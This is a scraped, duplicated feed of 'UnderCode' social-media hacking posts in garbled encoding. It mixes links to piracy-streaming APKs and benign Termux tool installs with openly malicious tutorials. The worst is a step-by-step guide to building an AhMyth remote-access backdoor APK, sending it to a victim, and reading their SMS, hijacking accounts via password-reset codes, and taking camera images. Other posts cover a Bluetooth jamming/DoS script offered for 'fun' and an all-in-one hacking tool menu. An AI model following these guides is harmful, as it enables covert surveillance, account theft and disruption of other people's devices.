- - - - - - UาNาDาEาRาCาOาDาEา- - - - -
๐ฆ15+ Best APKs For Free Movies & TV Shows With No Buffering:
Tested
(instagram.com/UnderCodeTestingCompany)
๐ฆINSTALLISATION:
1) UnlockMyTv
> https://morphtv.org/unlockmytv-apk/
2) Kodi
> https://kodi.tv/download
3) Cinema APK
> https://cinemaapk.net
4) CatMouse APK
> https://olatv.me/catmouse-apk/
5) Morph TV
> https://morphtv.net/
6) TVZion
> https://tvzion.me/
7) CyberFlix TV
> https://cyberflixtv.info/
8) BeeTV
> http://beetvapk.me/
9) Popcorn Time APK
> https://getpopcorntime.is/android.html
10) Live Lounge
> https://olatv.me/live-lounge-apk/
11) Typhoon TV
> https://www.typhoontv.me/
12) MediaBox HD
> https://mediaboxhd.net/
13) Solex TV
> https://www.solextv.com/
14) Megabox HD
> https://megaboxhdofficial.com/
15) Nova TV
> https://olatv.me/nova-tv-apk/
wฬฝอrฬฝอiฬฝอtฬฝอtฬฝอeฬฝอnฬฝอ ฬฝอbฬฝอyฬฝอ ฬฝอMฬฝอrฬฝอ.ฬฝอ ฬฝอBฬฝอoฬฝอtฬฝอNฬฝอeฬฝอtฬฝอ ฬฝอ(ฬฝอtฬฝอ.ฬฝอmฬฝอ.ฬฝอ)ฬฝอ
- - - - - - UาNาDาEาRาCาOาDาEา- - - - - -
๐ฆ15+ Best APKs For Free Movies & TV Shows With No Buffering:
Tested
(instagram.com/UnderCodeTestingCompany)
๐ฆINSTALLISATION:
1) UnlockMyTv
> https://morphtv.org/unlockmytv-apk/
2) Kodi
> https://kodi.tv/download
3) Cinema APK
> https://cinemaapk.net
4) CatMouse APK
> https://olatv.me/catmouse-apk/
5) Morph TV
> https://morphtv.net/
6) TVZion
> https://tvzion.me/
7) CyberFlix TV
> https://cyberflixtv.info/
8) BeeTV
> http://beetvapk.me/
9) Popcorn Time APK
> https://getpopcorntime.is/android.html
10) Live Lounge
> https://olatv.me/live-lounge-apk/
11) Typhoon TV
> https://www.typhoontv.me/
12) MediaBox HD
> https://mediaboxhd.net/
13) Solex TV
> https://www.solextv.com/
14) Megabox HD
> https://megaboxhdofficial.com/
15) Nova TV
> https://olatv.me/nova-tv-apk/
wฬฝอrฬฝอiฬฝอtฬฝอtฬฝอeฬฝอnฬฝอ ฬฝอbฬฝอyฬฝอ ฬฝอMฬฝอrฬฝอ.ฬฝอ ฬฝอBฬฝอoฬฝอtฬฝอNฬฝอeฬฝอtฬฝอ ฬฝอ(ฬฝอtฬฝอ.ฬฝอmฬฝอ.ฬฝอ)ฬฝอ
- - - - - - UาNาDาEาRาCาOาDาEา- - - - - -
Instagram
Login โข Instagram
Welcome back to Instagram. Sign in to check out what your friends, family & interests have been capturing & sharing around the world.
- - - - - - UาNาDาEาRาCาOาDาEา- - - - - -
๐ฆHOW BROWSING USING COMMAND LINE ONE TERMUX SIMPLY
(T.me/UnderCodeTestingOfficial)
๐ฆLET S START:
Open termux & Type:
1) apt update
2) apt upgrade
3) type
> pkg install w3m
>press Enter from your keyboard
> press y
4) RUN w3m along side the url of our choice.
> Now type w3m url kindly replace the url with any website.
> For instance, to access www.google.com ,
It Show After Typing the same example site like
> w3m www.google.com then press Enter from your keyboard.
5) WELL DONE NOW U BROWSING USING TERMUX
๐ฆHow to use the Keyboard while browsing via command line
6) tap anywhere in the search space
7) Simply slide from Left of your screen to Right,
> then tap on keyboard.
7) Now type Site url or text... in search engine
ENJOY
wฬฝอrฬฝอiฬฝอtฬฝอtฬฝอeฬฝอnฬฝอ ฬฝอbฬฝอyฬฝอ ฬฝอMฬฝอrฬฝอ.ฬฝอ ฬฝอBฬฝอoฬฝอtฬฝอNฬฝอeฬฝอtฬฝอ ฬฝอ(ฬฝอtฬฝอ.ฬฝอmฬฝอ.ฬฝอ)ฬฝอ
- - - - - - UาNาDาEาRาCาOาDาEา- - - - -
๐ฆHOW BROWSING USING COMMAND LINE ONE TERMUX SIMPLY
(T.me/UnderCodeTestingOfficial)
๐ฆLET S START:
Open termux & Type:
1) apt update
2) apt upgrade
3) type
> pkg install w3m
>press Enter from your keyboard
> press y
4) RUN w3m along side the url of our choice.
> Now type w3m url kindly replace the url with any website.
> For instance, to access www.google.com ,
It Show After Typing the same example site like
> w3m www.google.com then press Enter from your keyboard.
5) WELL DONE NOW U BROWSING USING TERMUX
๐ฆHow to use the Keyboard while browsing via command line
6) tap anywhere in the search space
7) Simply slide from Left of your screen to Right,
> then tap on keyboard.
7) Now type Site url or text... in search engine
ENJOY
wฬฝอrฬฝอiฬฝอtฬฝอtฬฝอeฬฝอnฬฝอ ฬฝอbฬฝอyฬฝอ ฬฝอMฬฝอrฬฝอ.ฬฝอ ฬฝอBฬฝอoฬฝอtฬฝอNฬฝอeฬฝอtฬฝอ ฬฝอ(ฬฝอtฬฝอ.ฬฝอmฬฝอ.ฬฝอ)ฬฝอ
- - - - - - UาNาDาEาRาCาOาDาEา- - - - -
- - - - - - UาNาDาEาRาCาOาDาEา- - - - - -
๐ฆTHE Most Usuable SCRipt For Termux Now
> The missing terminal file manager for X NOW AVAIBLE FOR TERMUX
+ Video Tutorial:
(Twitter.com/UnderCodeTC)
๐ฆWHAT CAN USE FOR ?
1) nnn is a full-featured terminal file manager. It's tiny, extremely light and fast.
2) nnn is also a disk usage analyzer, a fuzzy app launcher, a batch file renamer and a file picker. The plugin repository has 30+ plugins to extend the capabilities further. There's an independent (neo)vim plugin.
3) It runs smoothly on the Raspberry Pi, Termux on Android, Linux, macOS, BSD, Cygwin and Linux subsystem for Windows. nnn works seamlessly with DEs and GUI utilities. It's nearly zero-config (with sensible defaults) and can be setup in less than 5 minutes.
๐ฆ๐ธ๐ฝ๐ ๐ ๐ฐ๐ป๐ป๐ธ๐ ๐ฐ๐ ๐ธ๐พ๐ฝ & ๐ ๐ ๐ฝ:
Lets install DEpencies:
> TYPE
1) apt update && apt upgrade
2) sudo apt-get install pkg-config libncursesw5-dev libreadline-dev
3) make
4) sudo make strip install
5) Pick the appropriate file for your shell from misc/quitcd and add the contents to your shell's rc file. You'll need to spawn a new shell for the change to take effect. You should start nnn as n (or your preferred function name/alias).
If opted, nnn writes the last working directory to
> ${XDG_CONFIG_HOME:-$HOME/.config}/nnn/.lastd
๐ฆFOR MORE:
https://github.com/jarun/nnn/wiki/Basic-use-cases#configure-cd-on-quit
6) TYPE:
> curl -Ls https://raw.githubusercontent.com/jarun/nnn/master/plugins/getplugs | sh
๐ฆFOR MORE
> https://github.com/jarun/nnn/tree/master/plugins#installing-plugins
> https://github.com/jarun/nnn/tree/master/misc/nlaunch
7) Plugins are installed to
> ${XDG_CONFIG_HOME:-$HOME/.config}/nnn/plugins.
8) TO RUN :
> nnn -h
> man nnn
9) ๐ฆVideo Tutorial:
> https://www.youtube.com/watch?v=AbaauM7gUJw
ENJOY WITH OUR TUTORIALS
wฬฝอrฬฝอiฬฝอtฬฝอtฬฝอeฬฝอnฬฝอ ฬฝอbฬฝอyฬฝอ ฬฝอMฬฝอrฬฝอ.ฬฝอ ฬฝอBฬฝอoฬฝอtฬฝอNฬฝอeฬฝอtฬฝอ ฬฝอ(ฬฝอtฬฝอ.ฬฝอmฬฝอ.ฬฝอ)ฬฝอ
- - - - - - UาNาDาEาRาCาOาDาEา- - - - -
๐ฆTHE Most Usuable SCRipt For Termux Now
> The missing terminal file manager for X NOW AVAIBLE FOR TERMUX
+ Video Tutorial:
(Twitter.com/UnderCodeTC)
๐ฆWHAT CAN USE FOR ?
1) nnn is a full-featured terminal file manager. It's tiny, extremely light and fast.
2) nnn is also a disk usage analyzer, a fuzzy app launcher, a batch file renamer and a file picker. The plugin repository has 30+ plugins to extend the capabilities further. There's an independent (neo)vim plugin.
3) It runs smoothly on the Raspberry Pi, Termux on Android, Linux, macOS, BSD, Cygwin and Linux subsystem for Windows. nnn works seamlessly with DEs and GUI utilities. It's nearly zero-config (with sensible defaults) and can be setup in less than 5 minutes.
๐ฆ๐ธ๐ฝ๐ ๐ ๐ฐ๐ป๐ป๐ธ๐ ๐ฐ๐ ๐ธ๐พ๐ฝ & ๐ ๐ ๐ฝ:
Lets install DEpencies:
> TYPE
1) apt update && apt upgrade
2) sudo apt-get install pkg-config libncursesw5-dev libreadline-dev
3) make
4) sudo make strip install
5) Pick the appropriate file for your shell from misc/quitcd and add the contents to your shell's rc file. You'll need to spawn a new shell for the change to take effect. You should start nnn as n (or your preferred function name/alias).
If opted, nnn writes the last working directory to
> ${XDG_CONFIG_HOME:-$HOME/.config}/nnn/.lastd
๐ฆFOR MORE:
https://github.com/jarun/nnn/wiki/Basic-use-cases#configure-cd-on-quit
6) TYPE:
> curl -Ls https://raw.githubusercontent.com/jarun/nnn/master/plugins/getplugs | sh
๐ฆFOR MORE
> https://github.com/jarun/nnn/tree/master/plugins#installing-plugins
> https://github.com/jarun/nnn/tree/master/misc/nlaunch
7) Plugins are installed to
> ${XDG_CONFIG_HOME:-$HOME/.config}/nnn/plugins.
8) TO RUN :
> nnn -h
> man nnn
9) ๐ฆVideo Tutorial:
> https://www.youtube.com/watch?v=AbaauM7gUJw
ENJOY WITH OUR TUTORIALS
wฬฝอrฬฝอiฬฝอtฬฝอtฬฝอeฬฝอnฬฝอ ฬฝอbฬฝอyฬฝอ ฬฝอMฬฝอrฬฝอ.ฬฝอ ฬฝอBฬฝอoฬฝอtฬฝอNฬฝอeฬฝอtฬฝอ ฬฝอ(ฬฝอtฬฝอ.ฬฝอmฬฝอ.ฬฝอ)ฬฝอ
- - - - - - UาNาDาEาRาCาOาDาEา- - - - -
- - - - - - UาNาDาEาRาCาOาDาEา- - - - -
๐ฆNEW GREAT LINUX INSTALLER FOR TERMUX 2019
(Facebook.com/UnderCodeTestingCompanie)
๐ฆ๐ธ๐ฝ๐ ๐ ๐ฐ๐ป๐ป๐ธ๐ ๐ฐ๐ ๐ธ๐พ๐ฝ & ๐ ๐ ๐ฝ:
open termux & Type:
1) apt update
2) apt upgrade
3) echo "deb [trusted=yes] https://yadominjinta.github.io/files/ termux extras" >> $PREFIX/etc/apt/sources.list
4) pkg in atilo
๐ฆTO RUN
5) Commands:
> list list available distributions
> installed list installed distributions
> remove remove installed distributions
> install install distributions
> help Show this help
๐ฆFEATURES :
> CAN INSTALL:
1) aarch64 arm x86_64 i686
Arch โ โ ร ร
Alpine โ โ โ โ
CentOS โ โ โ โ
Debian โ โ โ โ
Fedora โ โ โ ร
Kali โ โ โ โ
OpenSuSE โ โ ร ร
ParrotOS โ โ โ โ
Ubuntu Cosmic โ โ โ
ENJOY WITH undercOde TUTORIALS
๐ฆ will send later video tut for this
wฬฝอrฬฝอiฬฝอtฬฝอtฬฝอeฬฝอnฬฝอ ฬฝอbฬฝอyฬฝอ ฬฝอMฬฝอrฬฝอ.ฬฝอ ฬฝอBฬฝอoฬฝอtฬฝอNฬฝอeฬฝอtฬฝอ ฬฝอ(ฬฝอtฬฝอ.ฬฝอmฬฝอ.ฬฝอ)ฬฝอ
- - - - - - UาNาDาEาRาCาOาDาEา- - - - -
๐ฆNEW GREAT LINUX INSTALLER FOR TERMUX 2019
(Facebook.com/UnderCodeTestingCompanie)
๐ฆ๐ธ๐ฝ๐ ๐ ๐ฐ๐ป๐ป๐ธ๐ ๐ฐ๐ ๐ธ๐พ๐ฝ & ๐ ๐ ๐ฝ:
open termux & Type:
1) apt update
2) apt upgrade
3) echo "deb [trusted=yes] https://yadominjinta.github.io/files/ termux extras" >> $PREFIX/etc/apt/sources.list
4) pkg in atilo
๐ฆTO RUN
5) Commands:
> list list available distributions
> installed list installed distributions
> remove remove installed distributions
> install install distributions
> help Show this help
๐ฆFEATURES :
> CAN INSTALL:
1) aarch64 arm x86_64 i686
Arch โ โ ร ร
Alpine โ โ โ โ
CentOS โ โ โ โ
Debian โ โ โ โ
Fedora โ โ โ ร
Kali โ โ โ โ
OpenSuSE โ โ ร ร
ParrotOS โ โ โ โ
Ubuntu Cosmic โ โ โ
ENJOY WITH undercOde TUTORIALS
๐ฆ will send later video tut for this
wฬฝอrฬฝอiฬฝอtฬฝอtฬฝอeฬฝอnฬฝอ ฬฝอbฬฝอyฬฝอ ฬฝอMฬฝอrฬฝอ.ฬฝอ ฬฝอBฬฝอoฬฝอtฬฝอNฬฝอeฬฝอtฬฝอ ฬฝอ(ฬฝอtฬฝอ.ฬฝอmฬฝอ.ฬฝอ)ฬฝอ
- - - - - - UาNาDาEาRาCาOาDาEา- - - - -
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
- - - - - - UาNาDาEาRาCาOาDาEา- - - - - -
๐ฆBLUTHOOTH DDOSER/KILLER/ JAMMER FOR ANY LINUX DISTRO OR ROOT ANDROID (TERMUX) 2019 script
This is very usefull bluetooth jammer or doser tool in kali or parrot linux...
(instagram.com/UnderCodeTestingCompany)
๐ฆINSTALLISATION & RUN:
1) apt update
2) apt upgrade
3) Use this tool.. Fun in jamming or dosing Bluetooth related devices like Hometheater,Erphones,etc...
4) git clone https://github.com/Anlos0023/bluedoser.git
5) cd bluedoser
6) chmod 7777 bluedoser.sh
7) ./bluedoser.sh
wฬฝอrฬฝอiฬฝอtฬฝอtฬฝอeฬฝอnฬฝอ ฬฝอbฬฝอyฬฝอ ฬฝอMฬฝอrฬฝอ.ฬฝอ ฬฝอBฬฝอoฬฝอtฬฝอNฬฝอeฬฝอtฬฝอ ฬฝอ(ฬฝอtฬฝอ.ฬฝอmฬฝอ.ฬฝอ)ฬฝอ
- - - - - - UาNาDาEาRาCาOาDาEา- - - - - -
๐ฆBLUTHOOTH DDOSER/KILLER/ JAMMER FOR ANY LINUX DISTRO OR ROOT ANDROID (TERMUX) 2019 script
This is very usefull bluetooth jammer or doser tool in kali or parrot linux...
(instagram.com/UnderCodeTestingCompany)
๐ฆINSTALLISATION & RUN:
1) apt update
2) apt upgrade
3) Use this tool.. Fun in jamming or dosing Bluetooth related devices like Hometheater,Erphones,etc...
4) git clone https://github.com/Anlos0023/bluedoser.git
5) cd bluedoser
6) chmod 7777 bluedoser.sh
7) ./bluedoser.sh
wฬฝอrฬฝอiฬฝอtฬฝอtฬฝอeฬฝอnฬฝอ ฬฝอbฬฝอyฬฝอ ฬฝอMฬฝอrฬฝอ.ฬฝอ ฬฝอBฬฝอoฬฝอtฬฝอNฬฝอeฬฝอtฬฝอ ฬฝอ(ฬฝอtฬฝอ.ฬฝอmฬฝอ.ฬฝอ)ฬฝอ
- - - - - - UาNาDาEาRาCาOาDาEา- - - - - -
Instagram
Login โข Instagram
Welcome back to Instagram. Sign in to check out what your friends, family & interests have been capturing & sharing around the world.
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
๐ฆHACK ANDROID REMONTLY/MONITOR + SMS EASY Steps... (EXPLOITE)BY UnderCode For medium experiences hacker on kali/ Wndows/termux...
(t.me/UnderCodeTestingOfficial)
๐ฆInstallisation & Run:
1) Download & Install AhMyth via 2 popular ways
A- using directly use the source code from GitHub
B- use the binaries they provide
๐ฆ SO LET S START: WITH METHODE 1 (A)
1) If you chose to start with the source code, then you'll need to check that you have a few prerequisites installed.
> Java โ it's used to generate the APK backdoor.
> Electron โ it's used to start the desktop application.
(https://github.com/electron/electron)
> Electron-builder and Electron-packer โ they are used to build the binaries for macOS, Windows, and Linux.
(https://github.com/electron-userland/electron-builder)
2) After instlling Those requestsOpen Terminal & Type:
> git clone https://github.com/AhMyth/AhMyth-Android-RAT.git
3) cd AhMyth-Android-RAT/AhMyth-Server
4) > npm start
5) This program is still in beta development, and as such, it isn't as robust as it could be. Some users have gotten errors when attempting to start it. If you do, try again running it as root, as seen below.
> sudo npm start --unsafe-perm
๐ฆIF USING METHODE B (From Binaries):
1) The source code is one way to download it, but if you're lazy like me, there's a slightly easier way โ use the binaries
2) Download or clone
> https://github.com/AhMyth/AhMyth-Android-RAT/releases
THEY HAVE FOR WINDOWS & LINUX
3) After installing :
> Build an APK
Now that we have the program up and running, it's time to build an Android application with a backdoor: ยซ just click on "Build."ยป
> At the top of the screen, select "APK Builder." The first thing to change is "Source IP." This needs to be the IP address of the computer you'll be sending and receiving commands from.
4) NOW navigate to to "C:\Users\UserName\AhMyth\Output" to find the built APK.
5) Now that you have a working APK, it's time to deploy it by downloading it on the target Android device( sending to victime)
6) For Auto install (same network adress)
If the Android phone doesn't want to install it, they probably never enabled "Unknown sources" in their settings. Open up the Settings, then go to "Security" and check "Unknown sources." This is how apps that come from outside the Google Play Store can be installed.
7) WELL DONE GET THEIR SMS EXAMPLE
If you really like to sow chaos, then you'll love this next feature: the ability to not only read but also send "SMS" messages. A simple way to use this would be to hack someone's Facebook by resetting their password with an SMS text, then use the code that is sent
8) DON T MIND WE CAN ALSO GET CAMERA IMAGES....
๐ฆTESTED BY undercOde on
> Win
> DEBIAN
wฬฝอrฬฝอiฬฝอtฬฝอtฬฝอeฬฝอnฬฝอ ฬฝอbฬฝอyฬฝอ ฬฝอMฬฝอrฬฝอ.ฬฝอ ฬฝอBฬฝอoฬฝอtฬฝอNฬฝอeฬฝอtฬฝอ ฬฝอ(ฬฝอtฬฝอ.ฬฝอmฬฝอ.ฬฝอ)ฬฝอ
- - - - - - UาNาDาEาRาCาOาDาEา- - - - - -
๐ฆHACK ANDROID REMONTLY/MONITOR + SMS EASY Steps... (EXPLOITE)BY UnderCode For medium experiences hacker on kali/ Wndows/termux...
(t.me/UnderCodeTestingOfficial)
๐ฆInstallisation & Run:
1) Download & Install AhMyth via 2 popular ways
A- using directly use the source code from GitHub
B- use the binaries they provide
๐ฆ SO LET S START: WITH METHODE 1 (A)
1) If you chose to start with the source code, then you'll need to check that you have a few prerequisites installed.
> Java โ it's used to generate the APK backdoor.
> Electron โ it's used to start the desktop application.
(https://github.com/electron/electron)
> Electron-builder and Electron-packer โ they are used to build the binaries for macOS, Windows, and Linux.
(https://github.com/electron-userland/electron-builder)
2) After instlling Those requestsOpen Terminal & Type:
> git clone https://github.com/AhMyth/AhMyth-Android-RAT.git
3) cd AhMyth-Android-RAT/AhMyth-Server
4) > npm start
5) This program is still in beta development, and as such, it isn't as robust as it could be. Some users have gotten errors when attempting to start it. If you do, try again running it as root, as seen below.
> sudo npm start --unsafe-perm
๐ฆIF USING METHODE B (From Binaries):
1) The source code is one way to download it, but if you're lazy like me, there's a slightly easier way โ use the binaries
2) Download or clone
> https://github.com/AhMyth/AhMyth-Android-RAT/releases
THEY HAVE FOR WINDOWS & LINUX
3) After installing :
> Build an APK
Now that we have the program up and running, it's time to build an Android application with a backdoor: ยซ just click on "Build."ยป
> At the top of the screen, select "APK Builder." The first thing to change is "Source IP." This needs to be the IP address of the computer you'll be sending and receiving commands from.
4) NOW navigate to to "C:\Users\UserName\AhMyth\Output" to find the built APK.
5) Now that you have a working APK, it's time to deploy it by downloading it on the target Android device( sending to victime)
6) For Auto install (same network adress)
If the Android phone doesn't want to install it, they probably never enabled "Unknown sources" in their settings. Open up the Settings, then go to "Security" and check "Unknown sources." This is how apps that come from outside the Google Play Store can be installed.
7) WELL DONE GET THEIR SMS EXAMPLE
If you really like to sow chaos, then you'll love this next feature: the ability to not only read but also send "SMS" messages. A simple way to use this would be to hack someone's Facebook by resetting their password with an SMS text, then use the code that is sent
8) DON T MIND WE CAN ALSO GET CAMERA IMAGES....
๐ฆTESTED BY undercOde on
> Win
> DEBIAN
wฬฝอrฬฝอiฬฝอtฬฝอtฬฝอeฬฝอnฬฝอ ฬฝอbฬฝอyฬฝอ ฬฝอMฬฝอrฬฝอ.ฬฝอ ฬฝอBฬฝอoฬฝอtฬฝอNฬฝอeฬฝอtฬฝอ ฬฝอ(ฬฝอtฬฝอ.ฬฝอmฬฝอ.ฬฝอ)ฬฝอ
- - - - - - UาNาDาEาRาCาOาDาEา- - - - - -
- - - - - - UาNาDาEาRาCาOาDาEา- - - - - -
๐ฆBest ANDROID EMULATOR S FOR LINUX & TESTING USES by undercOde:
(instagram.com/UnderCodeTestingCompany)
๐ฆใฅไนใไธ ไธใๅๅฐบใ:
1) Genymotion
> https://www.genymotion.com/
2) Anbox
> https://anbox.io/
3) Andro VM
> https://www.genymotion.com/ (by genymotion also)
4) Shashlik
> http://www.shashlik.io/download/
5) ARChon
> https://archon-runtime.github.io/
6) Android SDK
>https://developer.android.com/studio/index.html?hl=sk
7) Android-x86
> http://www.android-x86.org/
@ ฬฝอMฬฝอrฬฝอ.ฬฝอ ฬฝอBฬฝอoฬฝอtฬฝอNฬฝอeฬฝอtฬฝอ ฬฝอ(ฬฝอtฬฝอ.ฬฝอmฬฝอ.ฬฝอ)ฬฝอ
- - - - - - UาNาDาEาRาCาOาDาEา- - - - - -
๐ฆBest ANDROID EMULATOR S FOR LINUX & TESTING USES by undercOde:
(instagram.com/UnderCodeTestingCompany)
๐ฆใฅไนใไธ ไธใๅๅฐบใ:
1) Genymotion
> https://www.genymotion.com/
2) Anbox
> https://anbox.io/
3) Andro VM
> https://www.genymotion.com/ (by genymotion also)
4) Shashlik
> http://www.shashlik.io/download/
5) ARChon
> https://archon-runtime.github.io/
6) Android SDK
>https://developer.android.com/studio/index.html?hl=sk
7) Android-x86
> http://www.android-x86.org/
@ ฬฝอMฬฝอrฬฝอ.ฬฝอ ฬฝอBฬฝอoฬฝอtฬฝอNฬฝอeฬฝอtฬฝอ ฬฝอ(ฬฝอtฬฝอ.ฬฝอmฬฝอ.ฬฝอ)ฬฝอ
- - - - - - UาNาDาEาRาCาOาDาEา- - - - - -
Instagram
Login โข Instagram
Welcome back to Instagram. Sign in to check out what your friends, family & interests have been capturing & sharing around the world.
- - - - - UาNาDาEาRาCาOาDาEา- - - - -
๐ฆClang: a C language family frontend for LLVM
> AS NOTE ON THEIR GITHUB UPDATED EVERY 5 MINUTES
(t.me/UnderCodeTestingOfficial)
๐ฆFEATURES:
1) The Clang project provides a language front-end and tooling infrastructure for languages in the C language family (C, C++, Objective C/C++, OpenCL, CUDA, and RenderScript) for the LLVM project
2) Both a GCC-compatible compiler driver (clang) and an MSVC-compatible compiler driver (clang-cl.exe) are provided.
3) You can get and build the source today.
4) Fast compiles and low memory use
5) Expressive diagnostics (examples)
6) GCC compatibility
๐ฆINSTALLISATION:
THis tool is designed for linux Distro:
> Download: http://releases.llvm.org/download.html
๐ฆSO how to run & USE:
> USAGE: clang [options] <inputs>
๐ฆPlatform Support
libc++ is known to work on the following platforms, using g++ and clang. Note that functionality provided by <atomic> is only functional with clang.
> Mac OS X i386
>Mac OS X x86_64
>FreeBSD 10+ i386
>FreeBSD 10+ x86_64
>FreeBSD 10+ ARM
>Linux i386
>Linux x86_64
๐ฆSOME OPTIONS AFTER RUN clang [options] <inputs>
--analyze Run the static analyzer
-arcmt-migrate-emit-errors
Emit ARC errors even if the migrator can fix them
-arcmt-migrate-report-output <value>
Output path for the plist report
-B <dir> Add <dir> to search path for binaries and object files used implicitly
-CC Include comments from within macros in preprocessed output
-cfguard Emit tables required for Windows Control Flow Guard.
-cl-denorms-are-zero OpenCL only. Allow denormals to be flushed to zero.
wฬฝอrฬฝอiฬฝอtฬฝอtฬฝอeฬฝอnฬฝอ ฬฝอbฬฝอyฬฝอ ฬฝอMฬฝอrฬฝอ.ฬฝอ ฬฝอBฬฝอoฬฝอtฬฝอNฬฝอeฬฝอtฬฝอ ฬฝอ(ฬฝอtฬฝอ.ฬฝอmฬฝอ.ฬฝอ)ฬฝอ
- - - - - - UาNาDาEาRาCาOาDาEา- - - - - -
๐ฆClang: a C language family frontend for LLVM
> AS NOTE ON THEIR GITHUB UPDATED EVERY 5 MINUTES
(t.me/UnderCodeTestingOfficial)
๐ฆFEATURES:
1) The Clang project provides a language front-end and tooling infrastructure for languages in the C language family (C, C++, Objective C/C++, OpenCL, CUDA, and RenderScript) for the LLVM project
2) Both a GCC-compatible compiler driver (clang) and an MSVC-compatible compiler driver (clang-cl.exe) are provided.
3) You can get and build the source today.
4) Fast compiles and low memory use
5) Expressive diagnostics (examples)
6) GCC compatibility
๐ฆINSTALLISATION:
THis tool is designed for linux Distro:
> Download: http://releases.llvm.org/download.html
๐ฆSO how to run & USE:
> USAGE: clang [options] <inputs>
๐ฆPlatform Support
libc++ is known to work on the following platforms, using g++ and clang. Note that functionality provided by <atomic> is only functional with clang.
> Mac OS X i386
>Mac OS X x86_64
>FreeBSD 10+ i386
>FreeBSD 10+ x86_64
>FreeBSD 10+ ARM
>Linux i386
>Linux x86_64
๐ฆSOME OPTIONS AFTER RUN clang [options] <inputs>
--analyze Run the static analyzer
-arcmt-migrate-emit-errors
Emit ARC errors even if the migrator can fix them
-arcmt-migrate-report-output <value>
Output path for the plist report
-B <dir> Add <dir> to search path for binaries and object files used implicitly
-CC Include comments from within macros in preprocessed output
-cfguard Emit tables required for Windows Control Flow Guard.
-cl-denorms-are-zero OpenCL only. Allow denormals to be flushed to zero.
wฬฝอrฬฝอiฬฝอtฬฝอtฬฝอeฬฝอnฬฝอ ฬฝอbฬฝอyฬฝอ ฬฝอMฬฝอrฬฝอ.ฬฝอ ฬฝอBฬฝอoฬฝอtฬฝอNฬฝอeฬฝอtฬฝอ ฬฝอ(ฬฝอtฬฝอ.ฬฝอmฬฝอ.ฬฝอ)ฬฝอ
- - - - - - UาNาDาEาRาCาOาDาEา- - - - - -
- - - - - ๐๐D๐๐๐ฎ๐D๐- - - - -
๐ฆHackerpro - All in One Hacking Tool for Linux & Android (Termux)
Special for Termux:
(instagram.com/UnderCodeTestingCompany)
_INSTALLISATION _
๐ฆInstallation for Android:
1) install termux
2) apt update
3) apt upgrade
4) apt install git
5) apt install pythongit clone https://github.com/technicaldada/hackerpro.gitcd hackerpro
6) python hackerpro.py
๐ฆInstallation for Linux:
1) git clone https://github.com/technicaldada/hackerpro.git
2) cd hackerpro
3) python hackerpro.py
๐ฆWHAT YOU CAN DO WITH THIS TOOL:๐ฆ
HACKERPRO Menu
Information Gathering
Password Attacks
Wireless Testing
Exploitation Tools
Sniffing & Spoofing
Web Hacking
Private Web Hacking
Post Exploitation
Install The HACKERPRO
Information Gathering
Nmap
Setoolkit
Port Scanning
Host To IP
wordpress user
CMS scanner
XSStrike
Dork - Google Dorks Passive Vulnerability Auditor
Scan A server's Users
Crips
Password Attacks
Cupp
Ncrack
Wireless Testing
reaver
pixiewps
Fluxion
Exploitation Tools
ATSCAN
sqlmap
Shellnoob
commix
FTP Auto Bypass
jboss-autopwn
Sniffing & Spoofing
Setoolkit
SSLtrip
pyPISHER
SMTP Mailer
Web Hacking
Drupal Hacking
Inurlbr
Wordpress & Joomla Scanner
Gravity Form Scanner
File Upload Checker
Wordpress Exploit Scanner
Wordpress Plugins Scanner
Shell and Directory Finder
Joomla! 1.5 - 3.4.5 remote code execution
Vbulletin 5.X remote code execution
BruteX - Automatically brute force all services running on a target
Arachni - Web Application Security Scanner Framework
Private Web Hacking
Get all websites
Get joomla websites
Get wordpress websites
Control Panel Finder
Zip Files Finder
Upload File Finder
Get server users
SQli Scanner
Ports Scan (range of ports)
ports Scan (common ports)
Get server Info
Bypass Cloudflare
Post Exploitation
Shell Checker
POET
Weeman
๐ฆWell done All Those In One Simple Python SCRipt
@ ฬฝอMฬฝอrฬฝอ.ฬฝอ ฬฝอBฬฝอoฬฝอtฬฝอNฬฝอeฬฝอtฬฝอ ฬฝอ(ฬฝอtฬฝอ.ฬฝอmฬฝอ.ฬฝอ)ฬฝอ
- - - - - - ๐๐D๐๐๐ฎ๐D๐- - - - -
๐ฆHackerpro - All in One Hacking Tool for Linux & Android (Termux)
Special for Termux:
(instagram.com/UnderCodeTestingCompany)
_INSTALLISATION _
๐ฆInstallation for Android:
1) install termux
2) apt update
3) apt upgrade
4) apt install git
5) apt install pythongit clone https://github.com/technicaldada/hackerpro.gitcd hackerpro
6) python hackerpro.py
๐ฆInstallation for Linux:
1) git clone https://github.com/technicaldada/hackerpro.git
2) cd hackerpro
3) python hackerpro.py
๐ฆWHAT YOU CAN DO WITH THIS TOOL:๐ฆ
HACKERPRO Menu
Information Gathering
Password Attacks
Wireless Testing
Exploitation Tools
Sniffing & Spoofing
Web Hacking
Private Web Hacking
Post Exploitation
Install The HACKERPRO
Information Gathering
Nmap
Setoolkit
Port Scanning
Host To IP
wordpress user
CMS scanner
XSStrike
Dork - Google Dorks Passive Vulnerability Auditor
Scan A server's Users
Crips
Password Attacks
Cupp
Ncrack
Wireless Testing
reaver
pixiewps
Fluxion
Exploitation Tools
ATSCAN
sqlmap
Shellnoob
commix
FTP Auto Bypass
jboss-autopwn
Sniffing & Spoofing
Setoolkit
SSLtrip
pyPISHER
SMTP Mailer
Web Hacking
Drupal Hacking
Inurlbr
Wordpress & Joomla Scanner
Gravity Form Scanner
File Upload Checker
Wordpress Exploit Scanner
Wordpress Plugins Scanner
Shell and Directory Finder
Joomla! 1.5 - 3.4.5 remote code execution
Vbulletin 5.X remote code execution
BruteX - Automatically brute force all services running on a target
Arachni - Web Application Security Scanner Framework
Private Web Hacking
Get all websites
Get joomla websites
Get wordpress websites
Control Panel Finder
Zip Files Finder
Upload File Finder
Get server users
SQli Scanner
Ports Scan (range of ports)
ports Scan (common ports)
Get server Info
Bypass Cloudflare
Post Exploitation
Shell Checker
POET
Weeman
๐ฆWell done All Those In One Simple Python SCRipt
@ ฬฝอMฬฝอrฬฝอ.ฬฝอ ฬฝอBฬฝอoฬฝอtฬฝอNฬฝอeฬฝอtฬฝอ ฬฝอ(ฬฝอtฬฝอ.ฬฝอmฬฝอ.ฬฝอ)ฬฝอ
- - - - - - ๐๐D๐๐๐ฎ๐D๐- - - - -
Instagram
Login โข Instagram
Welcome back to Instagram. Sign in to check out what your friends, family & interests have been capturing & sharing around the world.
- - - - - ๐๐D๐๐๐ฎ๐D๐- - - - -
๐ฆEXPLOITE ANY LINUXโ ๏ธBy UnderCode
